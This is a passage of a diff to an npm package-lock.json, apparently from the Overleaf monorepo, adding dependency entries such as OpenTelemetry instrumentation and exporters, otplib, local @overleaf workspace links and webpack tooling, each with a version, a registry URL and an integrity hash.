"^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-restify": { + "version": "0.34.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-restify/-/instrumentation-restify-0.34.0.tgz", + "integrity": "sha512-KQZxg6aTaeDXk0NSjdY1Zd1N4BPnefFqOaTk/QuXElASwUGVwJESRvOVXfhtM+3sILbMccwSwPYwqSowYQn0LA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-router": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-router/-/instrumentation-router-0.33.1.tgz", + "integrity": "sha512-nz8PvjYMQWFgR17Yc5Sj624CamhXP021mWaWfHx6RhI6o67sPt+DT5468yZJZV1gMnaOSQfiBkjWZ7AGQkRutw==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-socket.io": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-socket.io/-/instrumentation-socket.io-0.34.1.tgz", + "integrity": "sha512-v9US0hXJaY7dkKOC2/CMLB526wn9F3CQrkeVUidvSm+AxFBoYXKdAUJijdBPWT4PKY98/VjFHuZ3HSe4QD8zPA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14.0" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-tedious": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-tedious/-/instrumentation-tedious-0.6.1.tgz", + "integrity": "sha512-zwgLKmWtAn0XsMb98aMaI7gCawzPqpy+LOgGTlYmUdqSVYnzMAn4QKrx24Rrd5pgmzOEIbAWHlpN7pOc1eIqxA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/tedious": "^4.0.6" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-winston": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-winston/-/instrumentation-winston-0.32.1.tgz", + "integrity": "sha512-wgXb2W2cbNdRQfXTH0jcnfbhlVPapmu13Wqhedj2pMpXS2aBnWAdvNFlArS6q84MEhzv3A4fVevjbwXa4uCzwQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/require-in-the-middle": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/require-in-the-middle/-/require-in-the-middle-7.2.0.tgz", + "integrity": "sha512-3TLx5TGyAY6AOqLBoXmHkNql0HIf2RGbuMgCDT2WO/uGVAPJs6h7Kl+bN6TIZGd9bWhWPwnDnTHGtW8Iu77sdw==", + "dependencies": { + "debug": "^4.1.1", + "module-details-from-path": "^1.0.3", + "resolve": "^1.22.1" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/otlp-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-exporter-base/-/otlp-exporter-base-0.41.2.tgz", + "integrity": "sha512-pfwa6d+Dax3itZcGWiA0AoXeVaCuZbbqUTsCtOysd2re8C2PWXNxDONUfBWsn+KgxAdi+ljwTjJGiaVLDaIEvQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/otlp-grpc-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-grpc-exporter-base/-/otlp-grpc-exporter-base-0.41.2.tgz", + "integrity": "sha512-OErK8dYjXG01XIMIpmOV2SzL9ctkZ0Nyhf2UumICOAKtgLvR5dG1JMlsNVp8Jn0RzpsKc6Urv7JpP69wzRXN+A==", + "dependencies": { + "@grpc/grpc-js": "^1.7.1", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "protobufjs": "^7.2.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/otlp-proto-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-proto-exporter-base/-/otlp-proto-exporter-base-0.41.2.tgz", + "integrity": "sha512-BxmEMiP6tHiFroe5/dTt9BsxCci7BTLtF7A6d4DKHLiLweWWZxQ9l7hON7qt/IhpKrQcAFD1OzZ1Gq2ZkNzhCw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "protobufjs": "^7.2.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagation-utils": { + "version": "0.30.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagation-utils/-/propagation-utils-0.30.1.tgz", + "integrity": "sha512-GCZg19gBSOTCeHvSCVy08WUyKAp2LyIRcRQPZk8MMAbmz8JWha3huBS9tNXjB4hYwRqW2SJOZzoYjt2P/BxvEw==", + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagator-aws-xray": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-aws-xray/-/propagator-aws-xray-1.3.1.tgz", + "integrity": "sha512-6fDMzFlt5r6VWv7MUd0eOpglXPFqykW8CnOuUxJ1VZyLy6mV1bzBlzpsqEmhx1bjvZYvH93vhGkQZqrm95mlrQ==", + "dependencies": { + "@opentelemetry/core": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagator-b3": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-b3/-/propagator-b3-1.15.2.tgz", + "integrity": "sha512-ZSrL3DpMEDsjD8dPt9Ze3ue53nEXJt512KyxXlLgLWnSNbe1mrWaXWkh7OLDoVJh9LqFw+tlvAhDVt/x3DaFGg==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/propagator-jaeger": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-jaeger/-/propagator-jaeger-1.15.2.tgz", + "integrity": "sha512-6m1yu7PVDIRz6BwA36lacfBZJCfAEHKgu+kSyukNwVdVjsTNeyD9xNPQnkl0WN7Rvhk8/yWJ83tLPEyGhk1wCQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/redis-common": { + "version": "0.36.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/redis-common/-/redis-common-0.36.1.tgz", + "integrity": "sha512-YjfNEr7DK1Ymc5H0bzhmqVvMcCs+PUEUerzrpTFdHfZxj3HpnnjZTIFKx/gxiL/sajQ8dxycjlreoYTVYKBXlw==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/resource-detector-alibaba-cloud": { + "version": "0.28.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-alibaba-cloud/-/resource-detector-alibaba-cloud-0.28.1.tgz", + "integrity": "sha512-0ucRgwid6bSAgYL5fiTkLh7aS9cPyz+Ijyv961SZbpMeIgVBvU931676xrdGNqlmuxavt24BrNUUWZ4XKq8ViA==", + "dependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-aws": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-aws/-/resource-detector-aws-1.3.1.tgz", + "integrity": "sha512-1n3U0ns0xlA8EIOMY1oEP5+5rZE/nfhIld6nw8T8PK4PkS3kAQb1ZCj3RXajs3qA+qWWIaEvCNREx3A0Ifyt3Q==", + "dependencies": { + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-container": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-container/-/resource-detector-container-0.3.1.tgz", + "integrity": "sha512-7zQASISRLmsaCKurvaoi7kTa0ab4iQEvPVfRo4k5RLSVi4puaCcC+2qOd6Fk4jEqNueevhyn2upGUeH+0EJ6yQ==", + "dependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-gcp": { + "version": "0.29.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-gcp/-/resource-detector-gcp-0.29.1.tgz", + "integrity": "sha512-u5mB53I49m0cXQ97dgZlgEnNin9xqwl9au2sXmblHG9XS6PocGoAgAiXGYYvITWhR3ID5Ei2GyGoJDFdAtCrVA==", + "dependencies": { + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0", + "gcp-metadata": "^5.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resources": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/resources/-/resources-1.15.2.tgz", + "integrity": "sha512-xmMRLenT9CXmm5HMbzpZ1hWhaUowQf8UB4jMjFlAxx1QzQcsD3KFNAVX/CAWzFPtllTyTplrA4JrQ7sCH3qmYw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-logs": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-logs/-/sdk-logs-0.41.2.tgz", + "integrity": "sha512-smqKIw0tTW15waj7BAPHFomii5c3aHnSE4LQYTszGoK5P9nZs8tEAIpu15UBxi3aG31ZfsLmm4EUQkjckdlFrw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.4.0 <1.5.0", + "@opentelemetry/api-logs": ">=0.39.1" + } + }, + "node_modules/@opentelemetry/sdk-metrics": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-metrics/-/sdk-metrics-1.15.2.tgz", + "integrity": "sha512-9aIlcX8GnhcsAHW/Wl8bzk4ZnWTpNlLtud+fxUfBtFATu6OZ6TrGrF4JkT9EVrnoxwtPIDtjHdEsSjOqisY/iA==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "lodash.merge": "^4.6.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-node": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-node/-/sdk-node-0.41.2.tgz", + "integrity": "sha512-t3vaB5ajoXLtVFoL8TSoSgaVATmOyUfkIfBE4nvykm0dM2vQjMS/SUUelzR06eiPTbMPsr2UkevWhy2/oXy2vg==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/exporter-jaeger": "1.15.2", + "@opentelemetry/exporter-trace-otlp-grpc": "0.41.2", + "@opentelemetry/exporter-trace-otlp-http": "0.41.2", + "@opentelemetry/exporter-trace-otlp-proto": "0.41.2", + "@opentelemetry/exporter-zipkin": "1.15.2", + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/sdk-trace-node": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-base": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-trace-base/-/sdk-trace-base-1.15.2.tgz", + "integrity": "sha512-BEaxGZbWtvnSPchV98qqqqa96AOcb41pjgvhfzDij10tkBhIu9m0Jd6tZ1tJB5ZHfHbTffqYVYE0AOGobec/EQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-node": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-trace-node/-/sdk-trace-node-1.15.2.tgz", + "integrity": "sha512-5deakfKLCbPpKJRCE2GPI8LBE2LezyvR17y3t37ZI3sbaeogtyxmBaFV+slmG9fN8OaIT+EUsm1QAT1+z59gbQ==", + "dependencies": { + "@opentelemetry/context-async-hooks": "1.15.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/propagator-b3": "1.15.2", + "@opentelemetry/propagator-jaeger": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "semver": "^7.5.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/semantic-conventions": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/semantic-conventions/-/semantic-conventions-1.15.2.tgz", + "integrity": "sha512-CjbOKwk2s+3xPIMcd5UNYQzsf+v94RczbdNix9/kQh38WiQkM90sUOi3if8eyHFgiBjBjhwXrA7W3ydiSQP9mw==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/sql-common": { + "version": "0.40.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/sql-common/-/sql-common-0.40.0.tgz", + "integrity": "sha512-vSqRJYUPJVjMFQpYkQS3ruexCPSZJ8esne3LazLwtCPaPRvzZ7WG3tX44RouAn7w4wMp8orKguBqtt+ng2UTnw==", + "dependencies": { + "@opentelemetry/core": "^1.1.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.1.0" + } + }, + "node_modules/@otplib/core": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz", + "integrity": "sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==" + }, + "node_modules/@otplib/plugin-crypto": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz", + "integrity": "sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==", + "dependencies": { + "@otplib/core": "^12.0.1" + } + }, + "node_modules/@otplib/plugin-thirty-two": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz", + "integrity": "sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==", + "dependencies": { + "@otplib/core": "^12.0.1", + "thirty-two": "^1.0.2" + } + }, + "node_modules/@otplib/preset-default": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz", + "integrity": "sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + }, + "node_modules/@otplib/preset-v11": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz", + "integrity": "sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + }, + "node_modules/@overleaf/access-token-encryptor": { + "resolved": "libraries/access-token-encryptor", + "link": true + }, + "node_modules/@overleaf/analytics": { + "resolved": "services/analytics", + "link": true + }, + "node_modules/@overleaf/chat": { + "resolved": "services/chat", + "link": true + }, + "node_modules/@overleaf/clsi": { + "resolved": "services/clsi", + "link": true + }, + "node_modules/@overleaf/clsi-cache": { + "resolved": "services/clsi-cache", + "link": true + }, + "node_modules/@overleaf/clsi-perf": { + "resolved": "services/clsi-perf", + "link": true + }, + "node_modules/@overleaf/codemirror-tree-view": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/@overleaf/codemirror-tree-view/-/codemirror-tree-view-0.1.3.tgz", + "integrity": "sha512-/ysOnX+ovObqj0uR78tumQtK/y0qFwbawcCGxT9JDeyJPgfPrK3PYTIvoZ1SgmSxaXpOPkds7aL+4Hv6VWZqSw==", + "dev": true, + "peerDependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0" + } + }, + "node_modules/@overleaf/contacts": { + "resolved": "services/contacts", + "link": true + }, + "node_modules/@overleaf/docstore": { + "resolved": "services/docstore", + "link": true + }, + "node_modules/@overleaf/document-updater": { + "resolved": "services/document-updater", + "link": true + }, + "node_modules/@overleaf/eslint-plugin": { + "resolved": "libraries/eslint-plugin", + "link": true + }, + "node_modules/@overleaf/fetch-utils": { + "resolved": "libraries/fetch-utils", + "link": true + }, + "node_modules/@overleaf/filestore": { + "resolved": "services/filestore", + "link": true + }, + "node_modules/@overleaf/github-sync": { + "resolved": "services/github-sync", + "link": true + }, + "node_modules/@overleaf/idp": { + "resolved": "services/idp", + "link": true + }, + "node_modules/@overleaf/logger": { + "resolved": "libraries/logger", + "link": true + }, + "node_modules/@overleaf/metrics": { + "resolved": "libraries/metrics", + "link": true + }, + "node_modules/@overleaf/mongo-utils": { + "resolved": "libraries/mongo-utils", + "link": true + }, + "node_modules/@overleaf/notifications": { + "resolved": "services/notifications", + "link": true + }, + "node_modules/@overleaf/o-error": { + "resolved": "libraries/o-error", + "link": true + }, + "node_modules/@overleaf/object-persistor": { + "resolved": "libraries/object-persistor", + "link": true + }, + "node_modules/@overleaf/piece-table": { + "resolved": "libraries/piece-table", + "link": true + }, + "node_modules/@overleaf/project-history": { + "resolved": "services/project-history", + "link": true + }, + "node_modules/@overleaf/promise-utils": { + "resolved": "libraries/promise-utils", + "link": true + }, + "node_modules/@overleaf/ranges-tracker": { + "resolved": "libraries/ranges-tracker", + "link": true + }, + "node_modules/@overleaf/real-time": { + "resolved": "services/real-time", + "link": true + }, + "node_modules/@overleaf/redis-wrapper": { + "resolved": "libraries/redis-wrapper", + "link": true + }, + "node_modules/@overleaf/references": { + "resolved": "services/references", + "link": true + }, + "node_modules/@overleaf/saas-e2e": { + "resolved": "tools/saas-e2e", + "link": true + }, + "node_modules/@overleaf/settings": { + "resolved": "libraries/settings", + "link": true + }, + "node_modules/@overleaf/stream-utils": { + "resolved": "libraries/stream-utils", + "link": true + }, + "node_modules/@overleaf/templates": { + "resolved": "services/templates", + "link": true + }, + "node_modules/@overleaf/third-party-datastore": { + "resolved": "services/third-party-datastore", + "link": true + }, + "node_modules/@overleaf/thirdparty-references": { + "resolved": "services/third-party-references", + "link": true + }, + "node_modules/@overleaf/tpdsworker": { + "resolved": "services/tpdsworker", + "link": true + }, + "node_modules/@overleaf/web": { + "resolved": "services/web", + "link": true + }, + "node_modules/@phosphor-icons/react": { + "version": "2.1.7", + "resolved": "https://registry.npmjs.org/@phosphor-icons/react/-/react-2.1.7.tgz", + "integrity": "sha512-g2e2eVAn1XG2a+LI09QU3IORLhnFNAFkNbo2iwbX6NOKSLOwvEMmTa7CgOzEbgNWR47z8i8kwjdvYZ5fkGx1mQ==", + "license": "MIT", + "engines": { + "node": ">=10" + }, + "peerDependencies": { + "react": ">= 16.8", + "react-dom": ">= 16.8" + } + }, + "node_modules/@pkgjs/parseargs": { + "version": "0.11.0", + "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", + "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", + "dev": true, + "optional": true, + "engines": { + "node": ">=14" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/@pmmmwh/react-refresh-webpack-plugin/-/react-refresh-webpack-plugin-0.5.16.tgz", + "integrity": "sha512-kLQc9xz6QIqd2oIYyXRUiAp79kGpFBm3fEM9ahfG1HI0WI5gdZ2OVHWdmZYnwODt7ISck+QuQ6sBPrtvUBML7Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-html": "^0.0.9", + "core-js-pure": "^3.23.3", + "error-stack-parser": "^2.0.6", + "html-entities": "^2.1.0", + "loader-utils": "^2.0.4", + "schema-utils": "^4.2.0", + "source-map": "^0.7.3" + }, + "engines": { + "node": ">= 10.13" + }, + "peerDependencies": { + "@types/webpack": "4.x || 5.x", + "react-refresh": ">=0.10.0 <1.0.0", + "sockjs-client": "^1.4.0", + "type-fest": ">=0.17.0 <5.0.0", + "webpack": ">=4.43.0 <6.0.0", + "webpack-dev-server": "3.x || 4.x || 5.x", + "webpack-hot-middleware": "2.x", + "webpack-plugin-serve": "0.x || 1.x" + }, + "peerDependenciesMeta": { + "@types/webpack": { + "optional": true + }, + "sockjs-client": { + "optional": true + }, + "type-fest": { + "optional": true + }, + "webpack-dev-server": { + "optional": true + }, + "webpack-hot-middleware": { + "optional": true + }, + "webpack-plugin-serve": { + "optional": true + } + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/source-map": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.7.4.tgz", + "integrity": "sha512-l3BikUxvPOcn5E74dZiq5BGsTb5yEwhaTSzccU6t4sDOH8NWJCstKO5QT2CvtFoK6F0saL7p9xHAqHOlCPJygA==", + "dev": true, + "license": "BSD-3-Clause", + "engines": { + "node": ">= 8" + } + }, + "node_modules/@pollyjs/adapter": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/adapter/-/adapter-6.0.6.tgz", + "integrity": "sha512-szhys0NiFQqCJDMC0kpDyjhLqSI7aWc6m6iATCRKgcMcN/7QN85pb3GmRzvnNV8+/Bi2AUSCwxZljcsKhbYVWQ==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6" + } + }, + 